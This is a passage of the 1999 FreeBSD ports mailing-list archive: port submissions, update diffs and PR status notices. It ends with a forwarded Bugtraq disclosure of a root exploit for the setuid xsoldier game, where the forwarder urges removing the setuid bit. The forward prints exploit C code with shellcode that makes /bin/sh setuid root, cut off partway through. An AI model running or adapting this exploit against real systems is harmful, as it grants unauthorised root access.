LaTeX, Postscript, Tcl/Tk, LISP, Forth, Perl, XShell Scripts, Occam, COBOL, and many other languages. It Xis similar to cxref in that it produces HTML output based Xon your code. X XWWW: http://www.xs4all.nl/~rfsber/Robo/robodoc.html XAuthor: Frans Slothouber X X--Will END-of-robodoc/pkg/DESCR echo x - robodoc/pkg/PLIST sed 's/^X//' >robodoc/pkg/PLIST << 'END-of-robodoc/pkg/PLIST' Xbin/robodoc Xshare/robodoc/example.c Xshare/robodoc/general.m4 Xshare/robodoc/main.css Xshare/robodoc/robodoc.html Xshare/robodoc/robodoc.m4 Xshare/robodoc/stoc.html Xshare/robodoc/stoc.m4 Xshare/robodoc/tocgen.m4 X@dirrm share/robodoc END-of-robodoc/pkg/PLIST echo x - robodoc/Makefile sed 's/^X//' >robodoc/Makefile << 'END-of-robodoc/Makefile' X# New ports collection makefile for: robodoc X# Version required: 3.1d X# Date created: 15 Dec 1999 X# Whom: Will Andrews X# X# $FreeBSD$ X# X XDISTNAME= robodoc XPKGNAME= robodoc-3.1d XCATEGORIES= devel XMASTER_SITES= http://www.xs4all.nl/~rfsber/Robo/ XEXTRACT_SUFX= .tgz X XMAINTAINER= andrews@technologist.com X XWRKSRC= ${WRKDIR}/Robodoc XMAKEFILE= makefile XUSE_GMAKE= yes XMAN1= robodoc.1 X Xdo-install: X @${INSTALL_PROGRAM} ${WRKSRC}/Source/robodoc ${PREFIX}/bin X @${INSTALL_MAN} ${WRKSRC}/Docs/robodoc.1 ${PREFIX}/man/man1 X.if !defined(NOPORTDOCS) X @${MKDIR} ${PREFIX}/share/robodoc X.for DOC in example.c general.m4 main.css robodoc.html robodoc.m4 \ X stoc.html stoc.m4 tocgen.m4 X @${INSTALL_DATA} ${WRKSRC}/Docs/${DOC} ${PREFIX}/share/robodoc X.endfor X @${ECHO} X @${ECHO} "Docs installed in ${PREFIX}/share/robodoc." X @${ECHO} X.endif X X.include END-of-robodoc/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 12:50:15 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 18F46155E3 for ; Wed, 15 Dec 1999 12:50:09 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA02712; Wed, 15 Dec 1999 12:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from anaconda.lovett.com (anaconda.lovett.com [216.60.121.168]) by hub.freebsd.org (Postfix) with ESMTP id B294D14A16 for ; Wed, 15 Dec 1999 12:42:58 -0800 (PST) (envelope-from ade@lovett.com) Received: from ade by anaconda.lovett.com with local (Exim 3.12 #1) id 11yLGD-000OLL-00 for FreeBSD-gnats-submit@freebsd.org; Wed, 15 Dec 1999 14:42:57 -0600 Message-Id: Date: Wed, 15 Dec 1999 14:42:57 -0600 From: Ade Lovett Reply-To: ade@lovett.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15506: Update x11-toolkits/gtk-engines Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15506 >Category: ports >Synopsis: Update x11-toolkits/gtk-engines >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 12:50:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ade Lovett >Release: FreeBSD 4.0-CURRENT i386 >Organization: Lovett Network Consultancy >Environment: Up to date ports tree. >Description: Update x11-toolkits/gtk-engines from 0.8 -> 0.9 >How-To-Repeat: N/A >Fix: Apply following patch: Version: 0.8 -> 0.9 Changes: Makefile files/md5 Adds: NONE Removes: NONE cvs diff: Diffing . Index: Makefile =================================================================== RCS file: /home/ncvs/ports/x11-toolkits/gtk-engines/Makefile,v retrieving revision 1.18 diff -u -r1.18 Makefile --- Makefile 1999/12/04 19:08:13 1.18 +++ Makefile 1999/12/10 17:35:40 @@ -1,12 +1,12 @@ # New ports collection makefile for: gtk-engines -# Version required: 0.8 +# Version required: 0.9 # Date Created: 23 Dec 1998 # Whom: Vanilla I. Shu # # $FreeBSD: ports/x11-toolkits/gtk-engines/Makefile,v 1.18 1999/12/04 19:08:13 steve Exp $ # -DISTNAME= gtk-engines-0.8 +DISTNAME= gtk-engines-0.9 CATEGORIES= x11-toolkits MASTER_SITES= ${MASTER_SITE_GNOME} MASTER_SITE_SUBDIR= stable/sources/gtk-engines cvs diff: Diffing files Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/x11-toolkits/gtk-engines/files/md5,v retrieving revision 1.4 diff -u -r1.4 md5 --- md5 1999/10/09 19:31:07 1.4 +++ md5 1999/12/10 17:37:28 @@ -1 +1 @@ -MD5 (gtk-engines-0.8.tar.gz) = ba5a3f25881da087e40eb8e4e90adb1c +MD5 (gtk-engines-0.9.tar.gz) = e0a31c8d294ac64cee476caff5295754 cvs diff: Diffing patches cvs diff: Diffing pkg >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 14:50: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5325A155B8 for ; Wed, 15 Dec 1999 14:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA41073; Wed, 15 Dec 1999 14:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 530C814A25 for ; Wed, 15 Dec 1999 14:49:17 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id RAA27070; Wed, 15 Dec 1999 17:49:13 -0500 (EST) (envelope-from wollman) Message-Id: <199912152249.RAA27070@khavrinen.lcs.mit.edu> Date: Wed, 15 Dec 1999 17:49:13 -0500 (EST) From: Garrett Wollman Reply-To: wollman@khavrinen.lcs.mit.edu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15509: New port: p5-Chart-PNGgraph Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15509 >Category: ports >Synopsis: New port: p5-Chart-PNGgraph >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 14:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Garrett Wollman >Release: FreeBSD 4.0-CURRENT i386 >Organization: MIT Laboratory for Computer Science >Environment: Irrelevant. >Description: I was in desperate need of some way to generate pie charts. The only thing that looked like it would do the trick was this Perl module. Note that it requires an upgrade of p5-GD before it will operate. >How-To-Repeat: cd /usr/ports/math; more */pkg/DESCR >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # p5-Chart-PNGgraph # p5-Chart-PNGgraph/Makefile # p5-Chart-PNGgraph/files # p5-Chart-PNGgraph/files/md5 # p5-Chart-PNGgraph/pkg # p5-Chart-PNGgraph/pkg/PLIST # p5-Chart-PNGgraph/pkg/COMMENT # p5-Chart-PNGgraph/pkg/PLIST~ # p5-Chart-PNGgraph/pkg/DESCR # echo c - p5-Chart-PNGgraph mkdir -p p5-Chart-PNGgraph > /dev/null 2>&1 echo x - p5-Chart-PNGgraph/Makefile sed 's/^X//' >p5-Chart-PNGgraph/Makefile << 'END-of-p5-Chart-PNGgraph/Makefile' X# New ports collection makefile for: p5-Chart-PNGgraph X# Version required: 1.13 X# Date Created: 15 December 1999 X# Whom: Garrett Wollman X# X# $FreeBSD$ X# X XDISTNAME= Chart-PNGgraph-1.13 XCATEGORIES= graphics perl5 XMASTER_SITES= ${MASTER_SITE_PERL_CPAN} XMASTER_SITE_SUBDIR= Chart X XMAINTAINER= ports@freebsd.org X XBUILD_DEPENDS= ${LOCALBASE}/lib/perl5/site_perl/${PERL_VER}/i386-freebsd/GD.pm:${PORTSDIR}/graphics/p5-GD X XUSE_PERL5= YES XBROKEN= "Requires GD 1.20 or higher." X XMAN3= Chart::PNGgraph.3 Chart::PNGgraph::colour.3 XMANPREFIX= ${PREFIX}/lib/perl5/${PERL_VERSION} X Xdo-configure: X @ cd ${WRKSRC}; ${SETENV} ${MAKE_ENV} ${PERL5} Makefile.PL X X.include END-of-p5-Chart-PNGgraph/Makefile echo c - p5-Chart-PNGgraph/files mkdir -p p5-Chart-PNGgraph/files > /dev/null 2>&1 echo x - p5-Chart-PNGgraph/files/md5 sed 's/^X//' >p5-Chart-PNGgraph/files/md5 << 'END-of-p5-Chart-PNGgraph/files/md5' XMD5 (Chart-PNGgraph-1.13.tar.gz) = dbf22d8b60edd78f5a24e83febbe2dd6 END-of-p5-Chart-PNGgraph/files/md5 echo c - p5-Chart-PNGgraph/pkg mkdir -p p5-Chart-PNGgraph/pkg > /dev/null 2>&1 echo x - p5-Chart-PNGgraph/pkg/PLIST sed 's/^X//' >p5-Chart-PNGgraph/pkg/PLIST << 'END-of-p5-Chart-PNGgraph/pkg/PLIST' Xlib/perl5/site_perl/%%PERL_VER%%/Chart/PNGgraph/linespoints.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/PNGgraph/bars.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/PNGgraph/area.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/PNGgraph/lines.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/PNGgraph/points.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/PNGgraph/pie.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/PNGgraph/utils.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/PNGgraph/axestype.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/PNGgraph/colour.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/PNGgraph/mixed.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/PNGgraph.pm X@dirrm lib/perl5/site_perl/%%PERL_VER%%/Chart/PNGgraph X@dirrm lib/perl5/site_perl/%%PERL_VER%%/Chart END-of-p5-Chart-PNGgraph/pkg/PLIST echo x - p5-Chart-PNGgraph/pkg/COMMENT sed 's/^X//' >p5-Chart-PNGgraph/pkg/COMMENT << 'END-of-p5-Chart-PNGgraph/pkg/COMMENT' XAnother Perl module for generating presentation graphics (i.e., charts)END-of-p5-Chart-PNGgraph/pkg/COMMENT echo x - p5-Chart-PNGgraph/pkg/PLIST~ sed 's/^X//' >p5-Chart-PNGgraph/pkg/PLIST~ << 'END-of-p5-Chart-PNGgraph/pkg/PLIST~' Xlib/perl5/site_perl/%%PERL_VER%%/Chart.pod Xlib/perl5/site_perl/%%PERL_VER%%/Chart/Bars.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/Base.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/Composite.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/Lines.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/LinesPoints.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/Points.pm Xlib/perl5/site_perl/%%PERL_VER%%/Chart/StackedBars.pm X@dirrm lib/perl5/site_perl/%%PERL_VER%%/Chart END-of-p5-Chart-PNGgraph/pkg/PLIST~ echo x - p5-Chart-PNGgraph/pkg/DESCR sed 's/^X//' >p5-Chart-PNGgraph/pkg/DESCR << 'END-of-p5-Chart-PNGgraph/pkg/DESCR' XChart::PNGgraph is a perl5 module to create and display XPNG output for a graph. The following classes for graphs Xwith axes are defined: X XChart::PNGgraph::lines X Create a line chart. X XChart::PNGgraph::bars X Create a bar chart. X XChart::PNGgraph::points X Create an chart, displaying the data as points. X XChart::PNGgraph::linespoints X Combination of lines and points. X XChart::PNGgraph::area X Create a graph, representing the data as areas under a X line. X XChart::PNGgraph::mixed X Create a mixed type graph, any combination of the X above. At the moment this is fairly limited. Some of X the options that can be used with some of the X individual graph types won't work very well. Multiple X bar graphs in a mixed graph won't display very nicely. X XAdditional types: X XChart::PNGgraph::pie X Create a pie chart. END-of-p5-Chart-PNGgraph/pkg/DESCR exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 15: 7:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EB7C0155CB; Wed, 15 Dec 1999 15:07:11 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA47899; Wed, 15 Dec 1999 15:07:11 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 15 Dec 1999 15:07:11 -0800 (PST) From: Message-Id: <199912152307.PAA47899@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, jedgar@FreeBSD.org Subject: Re: ports/15126: New port: databases/pxtools Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: databases/pxtools Responsible-Changed-From-To: freebsd-ports->jedgar Responsible-Changed-By: cpiazza Responsible-Changed-When: Wed Dec 15 15:06:50 PST 1999 Responsible-Changed-Why: Submitter is now a committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 15: 7:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1CAEE1519B; Wed, 15 Dec 1999 15:07:28 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA48007; Wed, 15 Dec 1999 15:07:22 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 15 Dec 1999 15:07:22 -0800 (PST) From: Message-Id: <199912152307.PAA48007@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, jedgar@FreeBSD.org Subject: Re: ports/15138: New port: deskutils/yank Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: deskutils/yank Responsible-Changed-From-To: freebsd-ports->jedgar Responsible-Changed-By: cpiazza Responsible-Changed-When: Wed Dec 15 15:07:12 PST 1999 Responsible-Changed-Why: Submitter is now a committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 15: 7:47 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6CD7914D35; Wed, 15 Dec 1999 15:07:46 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA48122; Wed, 15 Dec 1999 15:07:46 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 15 Dec 1999 15:07:46 -0800 (PST) From: Message-Id: <199912152307.PAA48122@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, jedgar@FreeBSD.org Subject: Re: ports/15176: Update port: databases/p5-Mysql Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: databases/p5-Mysql Responsible-Changed-From-To: freebsd-ports->jedgar Responsible-Changed-By: cpiazza Responsible-Changed-When: Wed Dec 15 15:07:23 PST 1999 Responsible-Changed-Why: Submitter is now a committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 15: 8: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 468DC155B8; Wed, 15 Dec 1999 15:08:05 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA48265; Wed, 15 Dec 1999 15:08:05 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 15 Dec 1999 15:08:05 -0800 (PST) From: Message-Id: <199912152308.PAA48265@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, jedgar@FreeBSD.org Subject: Re: ports/15261: Update port: graphics/kplot3d Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: graphics/kplot3d Responsible-Changed-From-To: freebsd-ports->jedgar Responsible-Changed-By: cpiazza Responsible-Changed-When: Wed Dec 15 15:07:47 PST 1999 Responsible-Changed-Why: Submitter is now a committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 15: 8:28 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 75D06155CB; Wed, 15 Dec 1999 15:08:27 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA48375; Wed, 15 Dec 1999 15:08:27 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 15 Dec 1999 15:08:27 -0800 (PST) From: Message-Id: <199912152308.PAA48375@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, jedgar@FreeBSD.org Subject: Re: ports/15320: Update port: graphics/gtkgraph Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: graphics/gtkgraph Responsible-Changed-From-To: freebsd-ports->jedgar Responsible-Changed-By: cpiazza Responsible-Changed-When: Wed Dec 15 15:08:07 PST 1999 Responsible-Changed-Why: Submitter is now a committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 15: 9:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2CD42155FA; Wed, 15 Dec 1999 15:09:10 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA48746; Wed, 15 Dec 1999 15:09:10 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 15 Dec 1999 15:09:10 -0800 (PST) From: Message-Id: <199912152309.PAA48746@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, jedgar@FreeBSD.org Subject: Re: ports/15338: New port: graphics/pngcrush Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: graphics/pngcrush Responsible-Changed-From-To: freebsd-ports->jedgar Responsible-Changed-By: cpiazza Responsible-Changed-When: Wed Dec 15 15:08:56 PST 1999 Responsible-Changed-Why: Submitter is now a committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 15:10:24 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CD673155B8; Wed, 15 Dec 1999 15:10:22 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA49349; Wed, 15 Dec 1999 15:10:21 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 15 Dec 1999 15:10:21 -0800 (PST) From: Message-Id: <199912152310.PAA49349@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, jedgar@FreeBSD.org Subject: Re: ports/15354: Update port: security/portsentry Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: security/portsentry Responsible-Changed-From-To: freebsd-ports->jedgar Responsible-Changed-By: cpiazza Responsible-Changed-When: Wed Dec 15 15:09:55 PST 1999 Responsible-Changed-Why: Submitter is now a committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 15:10:46 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B090115461; Wed, 15 Dec 1999 15:10:45 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA49587; Wed, 15 Dec 1999 15:10:45 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 15 Dec 1999 15:10:45 -0800 (PST) From: Message-Id: <199912152310.PAA49587@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, jedgar@FreeBSD.org Subject: Re: ports/15482: Update port: news/pan Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: news/pan Responsible-Changed-From-To: freebsd-ports->jedgar Responsible-Changed-By: cpiazza Responsible-Changed-When: Wed Dec 15 15:10:28 PST 1999 Responsible-Changed-Why: Submitter is now a committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 15:30: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 21F9E1563B for ; Wed, 15 Dec 1999 15:30:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA57755; Wed, 15 Dec 1999 15:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 15 Dec 1999 15:30:02 -0800 (PST) Message-Id: <199912152330.PAA57755@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: "Dan Langille" Subject: Re: ports/15490: update portsentry to use latest version Reply-To: "Dan Langille" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15490; it has been noted by GNATS. From: "Dan Langille" To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: ports/15490: update portsentry to use latest version Date: Thu, 16 Dec 1999 12:21:06 +1300 This PR appears to have been overtaken by PR 15354 I volunteer to be the maintainer of this port. -- Dan Langille - DVL Software Limited [I'm looking for more work] The FreeBSD Diary - http://www.freebsddiary.org/freebsd/ NZ FreeBSD User Group - http://www.nzfug.nz.freebsd.org/ The Racing System - http://www.racingsystem.com/racingsystem.htm unix @ home - http://www.unixathome.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 15:58:30 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CAB91155A5; Wed, 15 Dec 1999 15:58:28 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA63613; Wed, 15 Dec 1999 15:58:28 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 15 Dec 1999 15:58:28 -0800 (PST) From: Message-Id: <199912152358.PAA63613@freefall.freebsd.org> To: dan@freebsddiary.org, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15490: update portsentry to use latest version Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update portsentry to use latest version State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 15 15:57:44 PST 1999 State-Changed-Why: Duplicate of ports/15354 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 16: 5:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9E6B115257; Wed, 15 Dec 1999 16:05:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA64183; Wed, 15 Dec 1999 16:05:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 15 Dec 1999 16:05:21 -0800 (PST) From: Message-Id: <199912160005.QAA64183@freefall.freebsd.org> To: jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org, jedgar@FreeBSD.org Subject: Re: ports/15322: Update port: textproc/code2html Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: textproc/code2html Responsible-Changed-From-To: freebsd-ports->jedgar Responsible-Changed-By: jedgar Responsible-Changed-When: Wed Dec 15 16:04:52 PST 1999 Responsible-Changed-Why: Maintainer (me) is now a committer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 19:54:50 1999 Delivered-To: freebsd-ports@freebsd.org Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id 68EB215566 for ; Wed, 15 Dec 1999 19:54:43 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id AE07D1B62; Wed, 15 Dec 1999 22:54:10 -0500 (EST) From: Spidey MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14424.25185.473372.422010@anarcat.dyndns.org> Date: Wed, 15 Dec 1999 22:54:09 -0500 (EST) To: nacai@iname.com, ports@freebsd.org Subject: Fwd: FreeBSD 3.3 xsoldier root exploit X-Mailer: VM 6.72 under 21.1 (patch 7) "Biscayne" XEmacs Lucid Reply-To: Spidey Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi. Some buddy here thought it to be a good idea to scrap FBSD's reputation on Bugtraq, and it's going well. It's not the first time he posts about an exploit on a program part of the ports... I personnally think that 'xsoldier' should not be installed suid root since it's only for high scores management. I also _really_ think that someone should post on bugtraq to clearly explain that this is not a FBSD-specific exploit, but is part of xsoldier. If nobody will, I will. For now, it would be a _great_ idea to scrap the setuid bit on that darn xsoldier. :) Thanks for any replies The AnarCat. ------- start of forwarded message ------- From: Brock Tellier To: BUGTRAQ@SECURITYFOCUS.COM Date: Wed, 15 Dec 1999 17:11:36 MST Message-ID: <19991216001136.15774.qmail@nwcst286.netaddress.usa.net> Subject: FreeBSD 3.3 xsoldier root exploit Greetings, OVERVIEW A vulnerability in FreeBSD 3.3's xsoldier will allow any user to gain root access. This user does not have to have a valid $DISPLAY to exploit this. BACKGROUND Only FreeBSD 3.3-RELEASE has been tested. xsoldier, suid-root by default, was installed as part of the X11 games packages via /stand/sysinstall. DETAILS More problems with FreeBSD 3.3 ports. This time with xsoldier, a suid-root game. A simple overflow in the -display option allows any user to gain root. Although xsoldier only runs under X, a long -display arg on the CL will allow us to gain root. --- xsoldierx.c --- /* * xsoldier exploit for Freebsd-3.3-RELEASE * Drops a suid root shell in /bin/sh * Brock Tellier btellier@usa.net */ #include char shell[]= /* mudge@l0pht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui"; #define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n" void buildui() { FILE *fp; char cc[100]; fp = fopen("/tmp/ui.c", "w"); fprintf(fp, CODE); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); system(cc); } main (int argc, char *argv[] ) { int x = 0; int y = 0; int offset = 0; int bsize = 4400; char buf[bsize]; int eip = 0xbfbfdb65; /* works for me */ buildui(); if (argv[1]) { offset = atoi(argv[1]); eip = eip + offset; } fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE \n"); 